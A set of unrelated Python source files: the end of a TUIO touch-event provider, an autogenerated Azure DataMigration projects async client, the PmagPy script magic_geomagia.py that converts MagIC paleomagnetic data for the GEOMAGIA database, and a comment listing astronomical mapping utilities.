super(TuioMotionEvent, self).__init__(device, id, args)
# Default argument for TUIO touches
self.a = 0.0
self.b = 0.0
self.c = 0.0
self.X = 0.0
self.Y = 0.0
self.Z = 0.0
self.A = 0.0
self.B = 0.0
self.C = 0.0
self.m = 0.0
self.r = 0.0
angle = property(lambda self: self.a)
mot_accel = property(lambda self: self.m)
rot_accel = property(lambda self: self.r)
xmot = property(lambda self: self.X)
ymot = property(lambda self: self.Y)
zmot = property(lambda self: self.Z)
class Tuio2dCurMotionEvent(TuioMotionEvent):
'''A 2dCur TUIO touch.'''
def __init__(self, device, id, args):
super(Tuio2dCurMotionEvent, self).__init__(device, id, args)
def depack(self, args):
self.is_touch = True
if len(args) < 5:
self.sx, self.sy = list(map(float, args[0:2]))
self.profile = ('pos', )
elif len(args) == 5:
self.sx, self.sy, self.X, self.Y, self.m = list(map(float,
args[0:5]))
self.Y = -self.Y
self.profile = ('pos', 'mov', 'motacc')
else:
self.sx, self.sy, self.X, self.Y = list(map(float, args[0:4]))
self.m, width, height = list(map(float, args[4:7]))
self.Y = -self.Y
self.profile = ('pos', 'mov', 'motacc', 'shape')
if self.shape is None:
self.shape = ShapeRect()
self.shape.width = width
self.shape.height = height
self.sy = 1 - self.sy
super(Tuio2dCurMotionEvent, self).depack(args)
class Tuio2dObjMotionEvent(TuioMotionEvent):
'''A 2dObj TUIO object.
'''
def __init__(self, device, id, args):
super(Tuio2dObjMotionEvent, self).__init__(device, id, args)
def depack(self, args):
self.is_touch = True
if len(args) < 5:
self.sx, self.sy = args[0:2]
self.profile = ('pos', )
elif len(args) == 9:
self.fid, self.sx, self.sy, self.a, self.X, self.Y = args[:6]
self.A, self.m, self.r = args[6:9]
self.Y = -self.Y
self.profile = ('markerid', 'pos', 'angle', 'mov', 'rot',
'motacc', 'rotacc')
else:
self.fid, self.sx, self.sy, self.a, self.X, self.Y = args[:6]
self.A, self.m, self.r, width, height = args[6:11]
self.Y = -self.Y
self.profile = ('markerid', 'pos', 'angle', 'mov', 'rot', 'rotacc',
'acc', 'shape')
if self.shape is None:
self.shape = ShapeRect()
self.shape.width = width
self.shape.height = height
self.sy = 1 - self.sy
super(Tuio2dObjMotionEvent, self).depack(args)
class Tuio2dBlbMotionEvent(TuioMotionEvent):
'''A 2dBlb TUIO object.
# FIXME 3d shape are not supported
/tuio/2Dobj set s i x y a X Y A m r
/tuio/2Dblb set s x y a w h f X Y A m r
'''
def __init__(self, device, id, args):
super(Tuio2dBlbMotionEvent, self).__init__(device, id, args)
def depack(self, args):
self.is_touch = True
self.sx, self.sy, self.a, self.X, self.Y, sw, sh, sd, \
self.A, self.m, self.r = args
self.Y = -self.Y
self.profile = ('pos', 'angle', 'mov', 'rot', 'rotacc',
'acc', 'shape')
if self.shape is None:
self.shape = ShapeRect()
self.shape.width = sw
self.shape.height = sh
self.sy = 1 - self.sy
super(Tuio2dBlbMotionEvent, self).depack(args)
# registers
TuioMotionEventProvider.register('/tuio/2Dcur', Tuio2dCurMotionEvent)
TuioMotionEventProvider.register('/tuio/2Dobj', Tuio2dObjMotionEvent)
TuioMotionEventProvider.register('/tuio/2Dblb', Tuio2dBlbMotionEvent)
MotionEventFactory.register('tuio', TuioMotionEventProvider)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProjectsOperations:
"""ProjectsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.datamigration.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
group_name: str,
service_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ProjectList"]:
"""Get projects in a service.
The project resource is a nested resource representing a stored migration project. This method
returns a list of projects owned by a service resource.
:param group_name: Name of the resource group.
:type group_name: str
:param service_name: Name of the service.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProjectList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.datamigration.models.ProjectList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProjectList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-30"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ProjectList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects'} # type: ignore
async def create_or_update(
self,
group_name: str,
service_name: str,
project_name: str,
parameters: "_models.Project",
**kwargs: Any
) -> "_models.Project":
"""Create or update project.
The project resource is a nested resource representing a stored migration project. The PUT
method creates a new project or updates an existing one.
:param group_name: Name of the resource group.
:type group_name: str
:param service_name: Name of the service.
:type service_name: str
:param project_name: Name of the project.
:type project_name: str
:param parameters: Information about the project.
:type parameters: ~azure.mgmt.datamigration.models.Project
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Project, or the result of cls(response)
:rtype: ~azure.mgmt.datamigration.models.Project
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Project"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-30"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str'),
'projectName': self._serialize.url("project_name", project_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'Project')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('Project', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('Project', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'} # type: ignore
async def get(
self,
group_name: str,
service_name: str,
project_name: str,
**kwargs: Any
) -> "_models.Project":
"""Get project information.
The project resource is a nested resource representing a stored migration project. The GET
method retrieves information about a project.
:param group_name: Name of the resource group.
:type group_name: str
:param service_name: Name of the service.
:type service_name: str
:param project_name: Name of the project.
:type project_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Project, or the result of cls(response)
:rtype: ~azure.mgmt.datamigration.models.Project
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Project"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-30"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str'),
'projectName': self._serialize.url("project_name", project_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Project', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'} # type: ignore
async def delete(
self,
group_name: str,
service_name: str,
project_name: str,
delete_running_tasks: Optional[bool] = None,
**kwargs: Any
) -> None:
"""Delete project.
The project resource is a nested resource representing a stored migration project. The DELETE
method deletes a project.
:param group_name: Name of the resource group.
:type group_name: str
:param service_name: Name of the service.
:type service_name: str
:param project_name: Name of the project.
:type project_name: str
:param delete_running_tasks: Delete the resource even if it contains running tasks.
:type delete_running_tasks: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-30"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str'),
'projectName': self._serialize.url("project_name", project_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if delete_running_tasks is not None:
query_parameters['deleteRunningTasks'] = self._serialize.query("delete_running_tasks", delete_running_tasks, 'bool')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'} # type: ignore
async def update(
self,
group_name: str,
service_name: str,
project_name: str,
parameters: "_models.Project",
**kwargs: Any
) -> "_models.Project":
"""Update project.
The project resource is a nested resource representing a stored migration project. The PATCH
method updates an existing project.
:param group_name: Name of the resource group.
:type group_name: str
:param service_name: Name of the service.
:type service_name: str
:param project_name: Name of the project.
:type project_name: str
:param parameters: Information about the project.
:type parameters: ~azure.mgmt.datamigration.models.Project
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Project, or the result of cls(response)
:rtype: ~azure.mgmt.datamigration.models.Project
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Project"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-06-30"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str'),
'projectName': self._serialize.url("project_name", project_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'Project')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ApiError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Project', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/projects/{projectName}'} # type: ignore
|
|
#!/usr/bin/env python
import sys,os
from pmagpy import pmag
from pmagpy import contribution_builder as cb
#from datacite import DataCiteMDSClient
from habanero import Crossref
import datetime
from datetime import timedelta
import time as t
import dateutil.parser
def main():
"""
NAME
magic_geomagia.py
DESCRIPTION
Takes a MagIC file and outputs data for easier input into Max Brown's GEOMAGIA database
Requires the habanero python package to be installed. Try "pip install habanero" if you
get a "ModuleNotFoundError: No module named 'habanero'" error.
SYNTAX
magic_geomagia.py [command line options]
OPTIONS
-h: prints the help message and quits.
-f FILE: the MagIC data file name that will be converted to GEOMAGIA files
OUTPUT:
Print to standard out the GEOMAGIA insert command for the reference and the site level data
EXAMPLE:
magic_geomagia.py -f magic_contribution_16578.txt
Nick Jarboe
"""
if '-h' in sys.argv: # check if help is needed
print(main.__doc__)
sys.exit() # graceful quit
if '-f' in sys.argv:
ind=sys.argv.index('-f')
file_name=sys.argv[ind+1]
else:
print("MagIC file name needed. Please add the file name after the -f option.")
sys.exit()
# Create all the table files from the magic.txt file so they can be imported by the cb
command = "download_magic.py -f " + file_name
os.system(command)
md = cb.Contribution() #md stands for magic file data
md.propagate_location_to_measurements()
md.propagate_location_to_specimens()
md.propagate_location_to_samples()
if not md.tables:
print('-E- No MagIC tables could be found in this directory')
error_log("No MagIC tables found")
return
doi=md.tables['contribution'].df.iloc[0]['reference']
id=md.tables['contribution'].df.iloc[0]['id']
timestamp=md.tables['contribution'].df.iloc[0]['timestamp']
contributor=md.tables['contribution'].df.iloc[0]['contributor']
print("c=",contributor)
contributor=contributor.replace('@','')
print("c=",contributor)
cr = Crossref()
ref=cr.works(doi)
# authors = "Doe J.X., Alexander,T.G."
status= ref["status"]
message= ref["message"]
# print("message=",message)
authors= message["author"]
# print("authors=",authors)
authorList=""
for author in authors:
# print ("Name:",author['given'], author['family'])
author_given=""
names=author['given'].split(' ')
for name in names:
author_given +=name[0]+"."
authorList += author['family'] + " " + author_given + ", "
# print(authorList)
authorList=authorList[:-2]
# print(authorList)
title = message['title'][0]
year = message['created']['date-parts'][0][0]
# print(year)
journal = message['short-container-title'][0]
volume = message['volume']
# print(volume)
pages='0'
if "page" in message.keys():
pages = message['page']
# print(pages)
url = "https://earthref.org/MagIC/doi/" + doi
print("REFS")
print("Insert into REFS values(NULL,'", authorList, "','", title, "', ", year, ", '", journal, "', ", volume, ", '", pages, "', '", doi, "', '", url, "');", sep='')
print()
print("ARCHEODIJ")
sites=md.tables['sites'].df
locations=md.tables['locations'].df
print("UID,NUM_SAMPLES,NUM_ACC_SPEC,NUM_MEAS_SPEC,BA,SIGMA_BA,AGE, AGE_MIN,AGE_MAX,NUM_SIGMAS,AGE_ERROR_TYPE_ID,SITE_LAT, SITE_LON,VADM,SIGMA_VADM,SITE_ID,PI_METHODS_ID,AC_ID,MD_CK_ ID,AN_CORR_ID,CR_CORR_ID,DM_METHOD_ID,AF_STEP,T_STEP,DM_ ANALYSIS_ID,SPECIMEN_TYPE_ID,MATERIAL_ID,REFERENCE_ID,NUM_ C14_SAMPLES,C14_ID,CALIB_C14_AGE,CALIB_C14_AGE_SIGMA_MIN, CALIB_C14_AGE_SIGMA_MAX,NUM_C14_SIGMAS,CALC_CALIB_C14_AGE, CALC_CALIB_C14_AGE_SIGMA_MIN,CALC_CALIB_C14_AGE_SIGMA_MAX, C14_CALIB_SOFTWARE_ID,CALC_C14_CALIB_SOFTWARE_ID,C14_CALIB_DATASET_ID,CALC_C14_ CALIB_DATASET_ID,DENDRO_ID,TOT_NUM_DENDRO,NUM_DENDRO_ USED,DATING_METHOD_ID,NUM_DIR_SAMPLES,NUM_DIR_SPECIMENS,NUM_ DIR_SPEC_COLLECTED,DECL,INCL,ALPHA_95,K,VDM,SIGMA_VDM,SAMPLE_ID,c_csv,SITE_NAME, SITE_HORIZON,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,1011,1012,1013,1014, SUPERSEEDED,UPLOAD_YEAR,UPLOAD_MONTH,UPLOADER,EDITOR,EDIT_DATE,NOTES")
for index, row in sites.iterrows():
int_n_samples,int_n_specimens,int_n_total_specimens,int_abs,int_abs_sigma=-1,-1,-1,-1,-1
if 'int_n_samples' in sites.columns.values:
int_n_samples=row['int_n_samples']
if 'int_n_specimens' in sites.columns.values:
int_n_specimens=row['int_n_specimens']
if 'int_n_total_specimens' in sites.columns.values:
int_n_total_specimens=row['int_n_total_specimens']
if int_n_specimens == -1 and int_n_samples >0:
int_n_spcimens = int_n_samples
if 'int_abs' in sites.columns.values:
int_abs=row['int_abs']
if int_abs is not None:
int_abs=round(int_abs*1e6,1)
if 'int_abs_sigma' in sites.columns.values:
int_abs_sigma=row['int_abs_sigma']
if int_abs_sigma is not None:
int_abs_sigma=round(row['int_abs_sigma']*1e6,1)
age,age_high,age_low=-1e9,-1e9,-1e9
age_error_type='0' #
if 'age_unit' not in sites.columns.values:
print("Malformed Magic sites data table. Required column row 'age_unit' is missing")
sys.exit()
age_unit=row['age_unit']
if 'age' in sites.columns.values:
age=row['age']
age=pmag.age_to_BP(age,age_unit)
if 'age_high' in sites.columns.values:
age_high=row['age_high']
age_high=pmag.age_to_BP(age_high,age_unit)
if 'age_low' in sites.columns.values:
age_low=row['age_low']
age_low=pmag.age_to_BP(age_low,age_unit)
if 'age_sigma' in sites.columns.values:
age_sigma=row['age_sigma']
age_sigma=pmag.age_to_BP(age_sigma,age_unit)
age_high=age+age_sigma
age_low=age-age_sigma
age_error_type='5' #Magic is one sigma for all sigma state/province column to data modelages
if age_low > age_high: # MagIC lets age_high and age_low be in any order. Fix that for GEOMAGIA
temp=age_high
age_high=age_low
age_low=temp
if age == -1e9: # If only age_low and age_high are in the MagIC file then calculate the age.
age=(age_high+age_low)/2
age_error_type='8' #If MagIC age only high and low then error type is "range"
age_min=age-age_low # GEOMAGIA has the max and min as differences from the age, not absolute.
age_max=age_high-age
age_BP=age
age=1950-age #GEOMAGIA want +-AD/BC so convert BP to AD/-BC
lat=row['lat']
lon=row['lon']
vadm,vadm_sigma=-1,-1
if 'vadm' in sites.columns.values:
vadm=row['vadm']
vadm=vadm/1e22
if 'vadm_sigma' in sites.columns.values:
vadm=row['vadm']
vadm=vadm/1e22
site_name=row['site']
# For paleointensity codes just give the method code list and Max will decide on the right
# GEOMAGIA code.
method_codes="No MagIC method codes available"
if 'method_codes' in sites.columns.values:
method_codes=row['method_codes']
# Just give Max all the method codes for him to decide for now
paleointensity_procedure=method_codes
alteration_monitor="0"
alteration_monitor=method_codes_to_geomagia(method_codes,'ALTERATION_MONIT_CORR')
multidomain_check="0"
multidomain_check=method_codes_to_geomagia(method_codes,'MD_CHECKS')
anisotropy_correction="0"
anisotropy_correction=method_codes_to_geomagia(method_codes,'ANISOTROPY_CORRECTION')
cooling_rate="0"
cooling_rate=method_codes_to_geomagia(method_codes,'COOLING_RATE')
demag_method="0"
demag_method=method_codes_to_geomagia(method_codes,'DM_METHODS')
demag_analysis="0"
demag_analysis=method_codes_to_geomagia(method_codes,'DM_ANALYSIS')
specimen_shape="0"
specimen_shape=method_codes_to_geomagia(method_codes,'SPECIMEN_TYPE_ID')
materials=""
geologic_types=""
if 'geologic_types' in sites.columns.values:
geologic_types=row['geologic_types']
if ":" in geologic_types:
gtypes=geologic_types.split(":")
for gtype in gtypes:
materials=materials+pmag.vocab_convert(gtype,"geomagia")+":"
materials=materials[:-1]
else:
materials=pmag.vocab_convert(geologic_types,"geomagia")
geochron_codes=""
if ":" in method_codes:
gcodes=method_codes.split(":")
for gcode in gcodes:
if "GM-" == gcode[:3]:
geochron_codes=geochron_codes+pmag.vocab_convert(gcode,"geomagia")+":"
geochron_codes=geochron_codes[:-1]
else:
geochron_codes=pmag.vocab_convert(geochron_codes,"geomagia")
if geochron_codes == "":
geochron_codes="0"
dir_n_samples="-1"
if 'dir_n_samples' in sites.columns.values:
dir_n_samples=row['dir_n_samples']
dir_n_samples="-1"
if 'dir_n_samples' in sites.columns.values:
dir_n_samples=row['dir_n_samples']
# Not in MagIC
dir_n_specimens="-1"
# using total number of samples for total specimen number
dir_n_total_samples="-1"
if 'dir_n_total_samples' in sites.columns.values:
dir_n_total_samples=row['dir_n_total_samples']
dir_dec="999"
if 'dir_dec' in sites.columns.values:
dir_dec=row['dir_dec']
dir_inc="999"
if 'dir_inc' in sites.columns.values:
dir_inc=row['dir_inc']
dir_alpha95="-1"
if 'dir_alpha95' in sites.columns.values:
dir_alpha95=row['dir_alpha95']
dir_k="-1"
if 'dir_k' in sites.columns.values:
dir_k=row['dir_k']
vdm=-1
if 'vdm' in sites.columns.values:
vdm=float(row['vdm'])
vdm=vdm/1e22
vdm_sigma=-1
if 'vdm_sigma' in sites.columns.values:
vdm_sigma=float(row['vdm_sigma'])
vdm_sigma=vdm_sigma/1e22
# Could try and get sample names from samples table (using Contribution object) but just taking the list
# if it exists for now.
sample_list="-1"
if 'samples' in sites.columns.values:
sample_list=row['samples']
# c_csv is in GEOMAGIA insert. What it is I don't know. Max said set to 0
c_csv='0'
# This place_id is SITE_ID in GEOMAGIA
place_id="0"
location=row['location']
if 'state_province' in locations.columns.values:
place=locations.loc[location,'state_province']
if place != "":
place_id=pmag.vocab_convert(place,'GEOMAGIA')
if place_id == "0":
if 'country' in locations.columns.values:
place=locations.loc[location,'country']
if place != "":
place_id=pmag.vocab_convert(place,'GEOMAGIA')
if place_id == "0":
if 'continent_ocean' in locations.columns.values:
place_id=locations.loc[location,'continent_ocean']
if place != "":
place_id=pmag.vocab_convert(place,'GEOMAGIA')
site=row['site']
dt=dateutil.parser.parse(timestamp)
description="-1"
if 'description' in sites.columns.values:
description=row['description']
if age_BP <= 50000:
print("0",int_n_samples,int_n_specimens,int_n_total_specimens,int_abs,int_abs_sigma,age,age_min,age_max,"1",age_error_type,lat,lon,vadm,vadm_sigma,place_id,paleointensity_procedure,alteration_monitor,multidomain_check,anisotropy_correction,cooling_rate,demag_method,"0","0",demag_analysis,specimen_shape,materials,doi,"-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1",geochron_codes,dir_n_samples,dir_n_samples,dir_n_total_samples,dir_dec,dir_inc,dir_alpha95,dir_k,vdm,vdm_sigma,sample_list,c_csv,location,site,"-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1","-1",dt.year,dt.month,contributor,"-1,-1",description,sep=',')
#end for loop
def method_codes_to_geomagia(magic_method_codes,geomagia_table):
"""
Looks at the MagIC method code list and returns the correct GEOMAGIA code number depending
on the method code list and the GEOMAGIA table specified. Returns O, GEOMAGIA's "Not specified" value, if no match.
When mutiple codes are matched they are separated with -
"""
codes=magic_method_codes
geomagia=geomagia_table.lower()
geomagia_code='0'
if geomagia=='alteration_monit_corr':
if "DA-ALT-V" or "LP-PI-ALT-PTRM" or "LP-PI-ALT-PMRM" in codes:
geomagia_code='1'
elif "LP-PI-ALT-SUSC" in codes:
geomagia_code='2'
elif "DA-ALT-RS" or "LP-PI-ALT-AFARM" in codes:
geomagia_code='3'
elif "LP-PI-ALT-WALTON" in codes:
geomagia_code='4'
elif "LP-PI-ALT-TANGUY" in codes:
geomagia_code='5'
elif "DA-ALT" in codes:
geomagia_code='6' #at end to fill generic if others don't exist
elif "LP-PI-ALT-FABIAN" in codes:
geomagia_code='7'
if geomagia=='md_checks':
if ("LT-PTRM-MD" in codes) or ("LT-PMRM-MD" in codes):
geomagia_code='1:'
if ("LP-PI-BT-LT" in codes) or ("LT-LT-Z" in codes):
if "0" in geomagia_code:
geomagia_code="23:"
else:
geomagia_code+='2:'
geomagia_code=geomagia_code[:-1]
if geomagia=='anisotropy_correction':
if "DA-AC-AMS" in codes:
geomagia_code='1'
elif "DA-AC-AARM" in codes:
geomagia_code='2'
elif "DA-AC-ATRM" in codes:
geomagia_code='3'
elif "LT-NRM-PAR" in codes:
geomagia_code='4'
elif "DA-AC-AIRM" in codes:
geomagia_code='6'
elif "DA-AC" in codes: #at end to fill generic if others don't exist
geomagia_code='5'
if geomagia=='cooling_rate':
if "DA-CR" in codes: #all current CR codes but CR-EG are a 1 but may change in the future
geomagia_code='1'
if "DA-CR-EG" in codes:
geomagia_code='2'
if geomagia=='dm_methods':
if "LP-DIR-AF" in codes:
geomagia_code='1'
elif "LT-AF-D" in codes:
geomagia_code='1'
elif "LT-AF-G" in codes:
geomagia_code='1'
elif "LT-AF-Z" in codes:
geomagia_code='1'
elif "LP-DIR-T" in codes:
geomagia_code='2'
elif "LT-AF-Z" in codes:
geomagia_code='2'
elif "LP-DIR-M" in codes:
geomagia_code='5'
elif "LT-M-Z" in codes:
geomagia_code='5'
if geomagia=='dm_analysis':
if "DE-BFL" in codes:
geomagia_code='1'
elif "DE-BLANKET" in codes:
geomagia_code='2'
elif "DE-FM" in codes:
geomagia_code='3'
elif "DE-NRM" in codes:
geomagia_code='6'
if geomagia=='specimen_type_id':
if "SC-TYPE-CYC" in codes:
geomagia_code='1'
elif "SC-TYPE-CUBE" in codes:
geomagia_code='2'
elif "SC-TYPE-MINI" in codes:
geomagia_code='3'
elif "SC-TYPE-SC" in codes:
geomagia_code='4'
elif "SC-TYPE-UC" in codes:
geomagia_code='5'
elif "SC-TYPE-LARGE" in codes:
geomagia_code='6'
return geomagia_code
if __name__ == "__main__":
main()
|
|
# mapping tools, including:
# sextract(fits,sigma=5.,deblend=.005,minpix=10,fwhmlo=0.6,fwhmhi=1.5,cull=False,logfile='salt.log',debug=False)
# catid(yxcat_dt, yxcand_ds, offsettol=10., errtol=4.,debug=False,logfile='salt.log',name='')
# ccdcenter(image_rc)
# gaincor(hdu)
# YXcalc(ra_t,dec_t,RAd,DECd,PAd,fps)
# RSScoldistort(yx_ds,wav_s,coltem,distTab=[],debug=False)
# RSScamdistort(alfyx_ds,wav_s,camtem,distTab=[],debug=False)
# RSSpolsplit(alfyx_ds,wav_s,distTab=[],EOratTab=[],debug=False)
# RRSScolpolcam(YX_ds, wav_s, coltem, camtem, yxOEoff_d=np.zeros(2))
# RSSpolgeom(hdul,wavl,yxOEoff_d=np.zeros(2))
